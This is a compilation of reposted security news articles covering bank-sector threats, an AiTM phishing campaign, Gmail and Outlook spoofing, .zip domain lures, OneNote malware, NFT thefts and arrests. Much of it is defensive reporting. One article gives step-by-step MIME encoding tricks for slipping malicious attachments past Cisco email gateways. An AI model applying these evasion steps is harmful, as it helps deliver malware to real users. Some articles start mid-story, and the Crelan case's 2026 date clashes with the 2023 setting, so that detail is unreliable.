Recent research shows that when people choose a bank service, they are more likely to choose one that promises to secure their data. 

For customers, sensitive data protection is even more important than low fees.

Institutions and financial services store high volumes of compromising user data. This includes data such as social security numbers, credit and debit card details, and home addresses. In the wrong hands, this information can lead to stolen identity.

Therefore, when it comes to cybercrime in the financial sector, there is no space for mistakes.

But which cyber threats compromise data security in the finance sector?

Ransomware

Ransomware is a type of malware (malicious software) that encrypts files in an infected system, rendering them useless. Then, it displays a ransom message on the target’s screen, demanding financial compensation in exchange for the key that unlocks the documents.

Without the right key, the victim could lose their data forever. This is also the reason why some companies will pay the ransom — to retrieve their important data.

When a bank is the target of ransomware, this can mean the institution loses access to sensitive data such as patient names, home addresses, bank account information, IDs, or Driver’s license details. It all depends on which part of the system is compromised.

If leaked on the dark web or hacking forums (when the institution doesn’t pay the ransom), sensitive data can lead to identity fraud. What’s worse is that identity fraud is hardly ever a one-time occurrence. With the victim’s sensitive data online, there is a high chance they become repeat targets.

Why is it difficult to prevent ransomware?

Protecting financial institutions against ransomware is challenging. New types of this malware can bypass otherwise well-guarded security systems. Also, high-profile institutions get targeted by ransomware gangs that use more advanced hacking methods.

At the start of June 2023, a major Spanish bank known as Globalcaja, was affected by a ransomware attack. After discovering the threat, the bank released a statement that no sensitive user data was exposed in the incident.

Several branches of the bank were compromised in the security incident. 

A ransomware group dubbed the Play was behind this attack. 

The cybersecurity that the bank invested in enabled them to mitigate the issue early and prevent both reputational and financial damage from the possible data breach.

Phishing Attacks

Scammers often impersonate banks in their phishing campaigns. Bad actors send emails and SMS texts or make phone calls on behalf of a trusted credit card company. In their 2022 report, the FBI shared that phishing counted more victims than identity and credit card fraud.

When a bank finds out that their services and the visual identity of a company are used for phishing purposes, they can often do, warn their users to be vigilant of such scams.

In May 2023, a man from Montreal shared that scammers stole $13,000 from his bank account. A criminal, impersonating an employee of TD Bank, called the retired teacher and led him to believe that he was helping the bank to uncover a possible thief.

Claiming that there was suspicious activity on the teacher’s bank account, they urged the victim to deposit the money to a criminal’s crypto wallet.

The victim, who normally gets notifications when suspicious activity takes place in his account, believes that the bank didn’t do enough to protect his finances.

Most people think about individual phishing cases like these that have resulted in stolen life savings when considering phishing within the financial industry.

However, when scammers go for the weakest link in cybersecurity – humans – banks can be the targets of phishing as well.

One of the largest phishing scams by far took place within the Belgium bank Crelan in 2026. Scammers impersonate  CEOs via email to trick the bank’s financial department into transferring money. Estimated losses of this attack surpass $75 million.

Today, most companies combat phishing with awareness training that teaches the general workforce to recognize social engineering attacks.

Banks also send frequent emails that remind people that they wouldn’t ask them to send sensitive data via email or request it via phone. 

Still, phishing threats persevere.

They can be difficult to recognize, especially when the sender impersonates a highly trusted sender, such as a bank official or one’s boss.

Zero Day Exploits

Most security solutions scan the entire attack surface of the company to detect the signs of well-known threats and weaknesses. As with other companies, financial institutions can’t prepare for the threats their security tools can’t detect.

Zero-day vulnerabilities got their name since security teams have “zero days” to fix the flaw that can compromise user data.

In March 2023, Community Health Systems disclosed that the software which was used to transfer documents containing Social Security numbers had a zero-day weakness now known as CVE-2023-0669.

A ransomware group known as Clop exploited this zero-day flaw to obtain sensitive data from more than 130 organizations. All of them used the GoAnywhere file transfer program within their company.

A couple of weeks later, Hatch Bank also disclosed that the same zero-day flaw led to a breach of their system. The bank had to notify 140,000 users whose Social Security Numbers had been exposed in the attack.

The cases are currently under investigation, and many other victims are expected to come forward about the incident.

Final Word

The majority of cyberattacks are financially motivated. This makes the financial industry itself a logical target for opportunist criminals.

The most damaging cyber threats within the financial industry target customers’ sensitive data. Such incidents can damage the reputation of a financial institution, lead to identity theft for users, and cause major financial harm to the company in question.

Keeping the data private is already at the center of cybersecurity for the financial industry. Start with protecting the system with cybersecurity tools and introducing phishing awareness training for employees.

Investing in cybersecurity saves financial institutions millions that they could lose in potential cyber-attacks that compromise valuable user data.

The post 3 Prominent Data Security Risks in the Finance Industry appeared first on Information Security Newspaper | Hacking News.

This attack brings to light the intricacy of AiTM attacks and the extensive defenses that are required to fend them off. This complex AiTM attack necessitates additional remedial procedures in addition to the conventional ones for identity compromise, such as resetting a password. The affected companies need to delete their session cookies and undo any changes made to MFA that were carried out by the malicious attacker. This event also illustrates the need of engaging in proactive threat hunting to uncover new tactics, techniques, and procedures (TTPs) for previously recognized campaigns in order to identify and eliminate threats of this kind.

It is a sort of attack known as adversary-in-the-middle, and its intent is to intercept authentication that is taking place between users and a genuine authentication service for the purpose of either compromising identities or carrying out other types of operations. In order to steal a user’s credentials and intercept MFA in order to get their hands on the session cookie, the attackers will place themselves in between the user and the service. After then, the attackers may impersonate the user by replaying the session with the stolen session cookie before the time the token is set to expire, and they can do this without the user having to intervene or employ MFA. Because of this session, the attackers were able to access the resources and apps of the person who was compromised, as well as carry out additional malicious operations such as corporate email compromise attacks. Since the attackers are the ones who put up the phishing website as part of an AiTM attack via the indirect proxy approach, they have more control over the material that is shown on the website and may adjust it to correspond with the situation. In addition, since the perpetrators of the phishing attack are in control of the infrastructure, they have the ability to set up many servers simultaneously in order to avoid detection. There is no HTTP packet proxying as there is in traditional AiTM attacks; instead, there is direct communication between the target and the real website.

After a valid password has been entered and successfully validated, the server will provide a phony MFA page if MFA is requested. After the user has supplied their MFA token, the adversary will utilize that same token in the session that they have begun with the authentication provider. After the successful completion of the authentication process, the session token is given to the attacker, and the victim is taken to a different page. Following are attack stages

Stage 1: Initial access via a trusted vendor breach

Phishing emails purporting to come from reputable suppliers to the targeted companies were the first step in the campaign. A seven-digit number was used as the subject line of the phishing email that was sent. Because this code was different for each of the organizations that were targeted, it is probable that the attacker used it as a tracking method.

Stage 2: Clicking a harmful URL

In order to evade discovery, threat actors often exploit genuine services and trademarks in their activities. In this particular case, we were able to determine that the malicious actor behind the phishing effort used the respectable online tool Canva.

Stage 3: AiTM attack

When the user tried to access the URL, they were instead sent to a phishing website that was hosted on Tencent’s cloud infrastructure and imitated a Microsoft sign-in page.

Stage 4: Replay of the session cookie

An impersonation attack known as a stolen session cookie replay attack occurs when an adversary utilizes a genuine cookie that was stolen in order to fool authentication measures such as passwords and multi-factor authentication.

Stage 5: Modifying the MFA process

After that, the attacker went ahead and set up a new multi-factor authentication method for the target’s account, which consisted of a phone-based one-time password (OTP). This was done so that the attacker could sign in using the user’s stolen credentials without being discovered.

Stage 6: Developing an inbox rule

After some time, the attacker logged in with the new session token and proceeded to build a new Inbox rule with parameters. This rule transferred all incoming emails on the user’s mailbox to the Archive folder and tagged all of the emails as read.

Stage7: Phishing operation

After creating an Inbox rule, the attacker started a large-scale phishing effort that included more than 16,000 emails with a Canva URL that had been slightly changed. The emails were sent to distribution lists in addition to the contacts of the compromised user, who may have been located either within or outside of the business. The recipients were identified using the most recent email threads found in the inbox of the individual whose account had been hijacked.

Stage 8: BEC strategies and tactics

After that, the attacker checked the mailbox of the target user for emails that had not been delivered or that had been marked as out of office, and then they removed those emails from the Archive folder. The perpetrator of the attack went to the trouble of reading the emails sent by recipients who had doubts about the legitimacy of the phishing email and then replied, most likely to give the impression that the email is real when it is not.

Stage 9: Compromised Accounts

Phishing email receivers from inside the company who navigated to fraudulent websites by clicking on links included in those emails were subjected to a second AiTM attack.

Stage 10: BEC in its second stage

After the second AiTM attack, it was discovered that the attacker was launching a new phishing campaign from the inbox of one of the users whose account had been hacked.

The post New AiTM Phishing Attack Technique Makes It Easy to Hack Business Email Accounts appeared first on Information Security Newspaper | Hacking News.

Gmail has included a new function that displays an authorized brand with a blue verified tick, such as Apple, Google, or another company. This mechanism was put into place to differentiate between emails sent by spammers and those sent by genuine businesses.

However, threat actors have discovered a new method to misuse this functionality by sending spam emails that have a blue confirmed tick attached to them. The Gmail Checkmark System is a tool that was launched to assist users in defending themselves against impersonators and spam emails. Chris Plummer, a security researcher, uncovered this flaw, and he subsequently informed Google of his findings.

Unfortunately, this problem has been reacted to as “Intended Behaviour” and commented on as “Will not Fix.”

The researcher, on the other hand, offered an explanation in which he said that the email’s route was not a legitimate one. According to the statement made by Chris Plummer, “The sender discovered a way to trick gmail’s authoritative stamp of approval, which end users will trust.” I received this message on O365 after it originated from a Facebook account that was located in the United Kingdom. Nothing of this is even somewhat credible.

Following a string of tweets sent out by the researcher, Google decided to make addressing this problem their top priority (P1) and is presently hard at work finding a solution. In addition, Google expressed regret for its original answer and said, “After taking a deeper look, we found that this certainly doesn’t appear like a general SPF issue. As a result, we are revisiting this, and the relevant team is having a closer look at what has been going on. We sincerely appreciate you for insisting that we take a more in-depth look at this matter, and we would like to extend our apologies once again for the misunderstanding. We are aware that our original reaction may have been one of irritation.

Every researcher is devoting a significant amount of work to discovering vulnerabilities of high significance in large technology businesses. Any security researcher and his work will be made to seem bad if the company in question closes high-priority issues in a flash and mentions that they “Won’t fix” them.

The post Send spoofed phishing emails to Gmail accounts appeared first on Information Security Newspaper | Hacking News.

According to information published by a security researcher named mr.d0x last week, “with this phishing attack, you simulate a file archiver software (e.g., WinRAR) in the browser and use a.zip domain to make it appear more legitimate,”

In a nutshell, threat actors could develop a realistic-looking phishing landing page using HTML and CSS that replicates genuine file archiving software. They could then host the website on a.zip domain, which would elevate social engineering tactics to a higher level.

When a user clicks on a file that is “contained” inside the false ZIP package, a malicious actor might exploit this deception to redirect them to a website that collects credentials and use those credentials to gain access to the user’s account.

In addition to this, the search box in Windows File Explorer has the potential to become a deceptive portal via which users may search for a file that does not exist.If the file’s name corresponds to a valid.zip domain, then opening it in a web browser will automatically trigger the opening of the file.
This new information comes at the same time as Google introduced eight new top-level domains (TLDs), some of which include “.zip” and “.mov.” This move has caused some people to express worry that it may encourage phishing and other forms of online fraud.

This is due to the fact that .ZIP and .MOV are both valid file extension names, which has the ability to trick unwary users into visiting a malicious website rather than opening a file, which then leads to the user inadvertently installing malware.

Organizations and individual users may defend themselves against attacks that abuse top-level domains (TLDs) by being watchful and exercising care when receiving URLs with unknown top-level domains (TLDs) and avoiding clicking on them unless they are convinced that they are authentic. This protects them from the risk of falling victim to a TLD-based attack. When the mouse cursor is moved over a link, the actual URLs that the links are supposed to go to may be previewed. In addition, businesses and software developers should make sure that their tools, scripts, and apps do not depend on filename extensions but rather verify the file type based on the file headers. If this is not done, a URL might cause undesired or perhaps dangerous behavior from the tools and scripts.

The post New phishing technique to allows hacking someone using .zip & .mov domains appeared first on Information Security Newspaper | Hacking News.

Threat actors take advantage of the frequent feature updates that Microsoft makes to OneNote in order to install malware on users’ computers by tricking them into double-clicking on spam emails. This causes the user’s computer to automatically run a script that downloads malware from remote locations. A user’s device may be infected with malware, which can then be used not just to steal passwords but also to attack cryptocurrency wallets or even to install other software on the device without the user’s knowledge.

In the beginning, Microsoft eliminated the capability of its Office documents to make use of macros, which prevented malicious actors from using Excel and Word files to distribute malware. In addition, users are unable to open ZIP and ISO files without first going through a series of security warnings since Microsoft has restricted this functionality. Hackers have discovered methods to get around the ban on macros, which allows them to spread malware. Phishing emails may include a variety of bogus attachments, including fraudulent invoices, delivery confirmations, or alerts, amongst other things.

The majority of the time, the photographs in the email will be obscured, and the subject line will read, “Double Click to View File.” However, doing so actually launches a malicious Visual Basic script file, which begins contacts with a remote server to install malware, which may include a range of trojans. The file is designed to exploit vulnerabilities in Microsoft’s Visual Basic programming language.

Microsoft has already put a stop to the mining of cryptocurrencies on its network, since this activity is often associated with unlawful user access. Because of this, there has been a dramatic reduction in the deterioration and interruption of cloud services.

However, in order for users of OneNote to fully safeguard themselves, it is essential for them not to dismiss warnings that are shown by the program and to make use of multi-factor authentication, antivirus software, and firewalls whenever it is practicable to do so. In addition to this, it is essential that they refrain from downloading attachments from email URLs with which they are unfamiliar.

The post New kind of phishing attacks are exploiting Microsoft OneNote to bypass disabled macro appeared first on Information Security Newspaper | Hacking News.

“Error tolerance and various MIME decoding capabilities of email clients” are relied upon by the bypass techniques. The researcher claims that an attacker can bypass Cisco Secure Email Gateway-protected enterprises by using one of three techniques that affect email clients including Outlook, Thunderbird, Mutt, Vivaldi, and others.

First approach: cloaked Base 64
————————————-

Step-by-step guidance:

1. Use a conventional email client or standard MIME encoding, such as base64 content-transfer encoding, to create an email with the malicious attachment.
2. To make the lines in the base64 encoded block varying lengths while keeping groups of four base64 letters (encoding three bytes) together, randomly insert CR+LF line breaks. This is meant to avoid MIME standard violations while avoiding simple algorithms that can identify base64 even when it is not in context.
3. Place the contradictory header “Content-Transfer-Encoding: quoted-printable” before the attachment’s content-transfer-encoding header. The MIME standard has been broken here.
4. If the message has any content-length headers, remove them.

Even if the attachment contains otherwise readily recognized malware, like the Eicar test virus, emails sent in this way will pass through impacted gateways with a judgement of being clean from malware. On the other hand, many well-known email applications will display the attached file and accurately reproduce it after saving.

Systems impacted

A zip file containing the Eicar test virus and Cisco Secure Email Gateways running AsyncOS 14.2.0-620, 14.0.0-698, and other versions were used to successfully test this attack. Microsoft Outlook for Microsoft 365 MSO (Version 2210 Build 16.0.15726.20070), Mozilla Thunderbird 91.11.0 (64-bit), Vivaldi 5.5.2805.42, Mutt 2.1.4-1ubuntu1.1, and other email clients were among those that were impacted.

2nd approach: yEnc encoding
———————————-

Usenet clients frequently utilize the encoding known as yEncode, or simply yEnc. Some email clients can also decode MIME components that use this encoding. If a victim uses a certain email client, a remote attacker who uses this encoding for a malicious email attachment may be successful in delivering the payload to the victim while avoiding detection by affected gateways.
Other email clients will keep the attachment in an undecoded state, rendering it harmless.

Affected Systems:

A zip file containing the Eicar test virus and Cisco Secure Email Gateways running AsyncOS 14.2.0-620, 14.0.0-698, and other versions were used to successfully test this attack. Email client Mozilla Thunderbird 91.11.0 was impacted (64-bit).

Third Approach: CloakedQuotes-Printable
—————————————————

The roles of quoted-printable and base64 have been reversed in this technique, which is comparable to method 1. The payload must be encoded quoted-printable, but each byte must be encoded rather than only the non-printable bytes, and each line must include a continuation. The conflicting headers are now presented in base64-quoted-printable order.

Affected Systems:

A zip file containing the Eicar test virus and Cisco Secure Email Gateways running AsyncOS 14.2.0-620, 14.0.0-698, and other versions were used to successfully test this attack. Vivaldi 5.5.2805.42 (64-bit) and Mutt 2.1.4-1ubuntu1.1 were the affected email clients.

The researcher who revealed the bypass techniques mentioned an open source toolkit made for creating test emails for security solutions to see how well they defend against such attacks. The researcher said that while Cisco’s fix addresses the techniques used by the open source tool, it does not entirely block them.

The post 3 Techniques that allow bypassing phishing emails through Cisco Secure Email Gateway and are being actively used by ransomware gangs appeared first on Information Security Newspaper | Hacking News.

Proofpoint (cybersecurity company) has detected fraudulent emails where cybercriminals pose as the Microsoft team to try to deceive recipients, thus getting victims to sign a virtual book of condolences in memory of Elizabeth II.

By clicking on the link included in the phishing, those affected are redirected to a fraudulent page where they are asked to enter their email passwords. In addition to your data at Microsoft, attackers are also trying to steal multi-factor authentication (MFA) codes to gain control of your accounts.

Scam message.Proofpoint

With this scam, cybercriminals use a phishing framework called EvilProxy’  to reverse proxy landing pages to each recipient, harvest credentials, and bypass MFA protection.

The death of Elizabeth II has become a topic of social engineering for scammers, since it only requires the manipulation of the emotional state of users. In this case, the attackers cause a feeling of sadness among the victims, therefore, they create spaces to share comments and memories in honor of the queen with the intention of scamming users.

The post Phishing alert: Giving your condolences for Queen Elizabeth II can leave your data in the hands of cybercriminals appeared first on Information Security Newspaper | Hacking News.

The attack was first reported by Onchain analyst, OKHotshot, who posted on Twitter to alert what had happened. In a first tweet, the researcher mentioned that the BAYC and the OtherSide metaverse Discord accounts were compromised by threat actors.

Once the attackers gained access to these platforms, they posted a message targeting the NFT community offering purported exclusive giveaways for BAYC and Otherside token holders: “We are releasing another exclusive giveaway to all our holders listed above”, read the message, posted alongside a link to a phishing website.

As users may remember, phishing is an online identity theft technique in which scammers trick victims into revealing their confidential information using malicious websites. In the world of cryptocurrencies and NFTs, cybercriminals use these websites to gain access to victims’ online wallets and transfer the virtual assets to their own accounts.

Short after the researcher released the alert Yuga Labs acknowledged that its Discord servers were succesfully attacked: “The team caught the incident and quickly addressed it. It seems that about 200 ETH in NFT had been affected. We’re still investigating, but if you were affected, please email us”.

Lousy background

As mentioned above, this is the second attack against Yuga Labs in just two months; the first incident was reported in mid-April, through the hacking of BAYC’s official Instagram account to post a malicious link that allowed the theft of 91 “apes”. The attackers responsible for this theft also used a link to a fake BAYC website promoting an alleged giveaway; once affected users entered their information, their virtual assets were transferred to addresses controlled by the hackers.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post <strong>How bored Ape NFTs are being hacked again and again. 200 ETH stolen</strong> appeared first on Information Security Newspaper | Hacking News.

The report, by Bitdefender, mentions: “Users in a position to validate a link in an email client before clicking on it, will be susceptible to clicking on it because it has not yet been translated into a real domain name in their browser. The actual domain name would only be seen after the page has started to open.”

The term IDN refers to domain names that, in whole or in part use characters from a non-Latin script or alphabet, which are encoded by the Unicode standard. In order for the Domain Name System (DNS) to interpret them correctly, IDNs are stored in the DNS as ASCII strings using Punycode transcription.

Counterfeit IDN homograph domains can be created by combining letters from different alphabets, which to the user look so similar to each other that it is impossible to distinguish them, although Unicode treats them as separate entities. This is not a new concept, although it is still a problem for many users.

Most browsers, for example, display in the address bar the real name of an internationalized domain name (https://xn--n1aag8f.com, for example) instead of the name to display the real name (https://žugec.com) if the site is suspicious. However, Office applications, including Outlook, display the name in another method:

Since domain registration verification greatly limits which counterfeit domains can be registered and most browsers display the real name of the spoofed IDN domain, IDN homograph attacks have ceased to be a constant cybersecurity threat, although threat actors may find ways to deploy these attacks on a large scale.

Microsoft acknowledged the problem when it received the Bitdefender report, though it’s unclear if the issue will be fixed. While the issue is resolved, endpoint security solutions and IP and URL reputation services could collaborate by blocking most suspicious domains.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post How to hide spoofed malicious domain when users hover above a link in a phishing email in Microsoft Outlook, Word or Excel document? appeared first on Information Security Newspaper | Hacking News.

One of those arrested faces charges of possession of fraudulent documents, impersonation, and obtaining money with false claims, and could spend more than three years in prison. The other two defendants face only one count of possession of fraudulent documents, which Interpol believes they would have used in a business email compromise (BEC) campaign.

During the arrest of the three individuals, laptops and smartphones used for this fraudulent operation were confiscated, allowing law enforcement to discover that the hackers were using the RAT known as Agent Tesla. This malware variant allows information theft, keystroke logging, and theft of credentials stored in web browsers, email clients, and other platforms.

The defendants allegedly used Agent Tesla to steal credentials in the targeted organizations, in addition to accessing internal emails and maintaining constant surveillance of employees in these companies. The collection of information about the target is a fundamental part of a BEC attack since threat actors need to know the processes, standards, and actors involved in the processes of the affected organizations.

Cybersecurity specialists report that Agent Tesla has become one of the most widely used malware variants today, above other variants such as AveMaria, Formbook, Lokibot, RedLine, and Wakbot.

In recent days, Interpol also collaborated with the arrest of the alleged leader of SilverTerrier, another BEC operation allegedly run by cyber criminals in Nigeria.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post Interpol arrests hackers who attacked oil and gas companies worldwide: Operation Killer Bee appeared first on Information Security Newspaper | Hacking News.

Even though Verizon was notified and has already acknowledged the leak, its representatives deny that the compromised information poses a security threat to its employees and customers.

The alleged hackers behind this incident claimed that it was very easy for them to access this database, as they simply had to contact a Verizon employee and pose as a co-worker in the internal support area. After fooling this unsuspecting employee, the hackers were able to connect to Verizon’s internal tool and access sensitive information.

Once in the database, the hacker reported having created a tool that allowed them to download the information stored in the company’s systems. Verizon would soon receive a ransom note threatening to expose the compromised information if a $250,000 ransom is not paid.

Not a security risk?

As mentioned above, a Verizon representative stated that the company does not consider the compromised records as confidential information, so they do not plan to negotiate any ransom with the hackers. The representative added that, for Verizon, information security is a serious matter, so the company has the best measures to protect their customer and employees’ data.

Information security specialists differ from Verizon’s stance, as while the leak does not involve passwords, bank records, or social security numbers, the stolen data could still prove useful for multiple hacking groups. Phishing campaigns, phone fraud, SIM swap, and email spam are just some of the risks to which those affected could be exposed.  

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post Full names, IDs, email addresses, and phone numbers of hacked Verizon employees: Customers could experience increased SIM swap attacks appeared first on Information Security Newspaper | Hacking News.

In an interview with Vice, the victim, simply known as Keith, claims that hackers tricked him into visiting a specially designed phishing website: “The site had a smart contract to move all my Moonbirds in one swoop; although at first, the transactions failed, they finally materialized.”

Keith, who claims to be an oncologist, husband, and father of three, claims he decided to invest his life savings in NFT, only to see these assets disappear in a matter of a few minutes.

He added that hackers used a Twitter account to contact him a few weeks ago. After the initial contact, Keith continued to interact with the scammers until he received an offer to sell his Moonbirds collection; the account used by the hackers has already been deleted.

The victim sent a message to the hackers, hoping to recover his collection: “Please return the stolen moonbirds to the original owner. Keep one as compensation.”

The collector adds that, if his tokens are not returned before this weekend, he will notify the FBI about the incident.

Common issues

NFT collectors have become frequent victims of ambitious phishing and social engineering campaigns, as this is a vector of quick and easy access to virtual collections worth tens of thousands of dollars.

The researcher Tal Be’ery was able to analyze this attack, concluding that this operation could be complex for the hackers in charge because they tried to use a smart contract to leave no trace; failing in their attempt, the cybercriminals simply used a conventional address to divert the stolen tokens.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post Hackers theft over $1.4 million worth of Moonbird NFT collection appeared first on Information Security Newspaper | Hacking News.